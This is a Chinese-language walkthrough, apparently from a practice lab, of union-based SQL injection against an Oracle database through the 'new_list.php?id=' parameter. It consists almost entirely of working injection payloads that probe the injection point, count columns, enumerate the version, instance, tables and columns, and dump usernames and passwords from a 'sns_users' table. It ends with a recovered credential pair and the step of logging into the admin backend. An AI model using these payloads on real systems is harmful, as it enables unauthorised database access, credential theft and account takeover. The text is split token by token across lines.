步骤一:判断注入点
new_list
.
php
?
id
=
1
and
1
=
1
new_list
.
php
?
id
=
1
and
1
=
2
步骤⼆:通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断当前字段数为2
new_list
.
php
?
id
=
1
order by
2
new_list
.
php
?
id
=
1
order by
3
步骤三:获取回显点
new_list.php?id=-1 union select '1','null' from dual
步骤四:查询数据库版本信息
new_list.php?id=-1union select 'null',(select banner from sys.v_$version where rownum=1) from dual
步骤五:查询当前数据库库名
new_list
.
php
?
id
=-
1
union select
'null'
,(
select instance_name
from
V
$INSTANC
E)
from
dual
步骤六:查询数据库表名,查询表名⼀般查询admin或者user表
#获取第⼀个表名LOGMNR_SESSION_EVOLVE$
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 ) from dual
#获取第⼆个表名LOGMNR_GLOBAL$
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
#获取第三个表名LOGMNR_GT_TAB_INCLUDE$
new_list.php?id=-1 union select 'null',(select table_name from user_tables
where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_nam
e not in 'LOGMNR_GLOBAL$') from dual
#模糊搜索查询.获取sns_users表名
new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
步骤七:查询数据库列名
直接查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where rownum=1 and column_name not in 'USER_NAME') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not
in 'AGENT_NAME') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not
in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in
'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID'
and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <>
'TABLE_OBJNO') from dual
模糊搜索查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%' and column_name <> 'USER_NAME') from dual
步骤⼋:查询数据库数据获取账号密码的字段内容
new_list
.
php
?
id
=-
1
union select USER_NAME
,
USER_PWD
from
"sns_users"
where
rownum=
1
new_list
.
php
?
id
=-
1
union select USER_NAME
,
USER_PWD
from
"sns_users"
where
rownum=
1
and
USER_NAME
<>
'zhong'
new_list
.
php
?
id
=-
1
union select USER_NAME
,
USER_PWD
from
"sns_users"
where
rownum=
1
and
USER_NAME
<>
'zhong'
and
USER_NAME
not in
'hu'
步骤九:对其数据库内的字段内容进⾏解密....进⾏后台登录
mozhe
:439718